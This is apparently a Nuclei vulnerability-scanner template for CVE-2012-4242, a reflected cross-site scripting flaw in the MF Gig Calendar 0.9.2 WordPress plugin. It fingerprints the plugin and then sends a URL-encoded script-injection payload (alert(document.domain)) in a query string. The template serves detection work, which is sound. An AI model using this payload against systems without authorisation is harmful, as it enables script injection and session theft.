id: CVE-2012-4242 info: name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.08857 epss-percentile: 0.94536 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: "mf_gig_calendar_project" product: "mf_gig_calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project,vuln flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'MF Gig Calendar =' - method: GET path: - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100d4921ec47db7ac744cb7dabeda54f97e58c1b48fddfb5f6c38dd6210c41ff5c1022100b65686c1ab44ddb7a2a73a6fe7a440880b1258d70c45a3f3f342aaaad01a4ec9:922c64590222798bb761d5b6d8e72950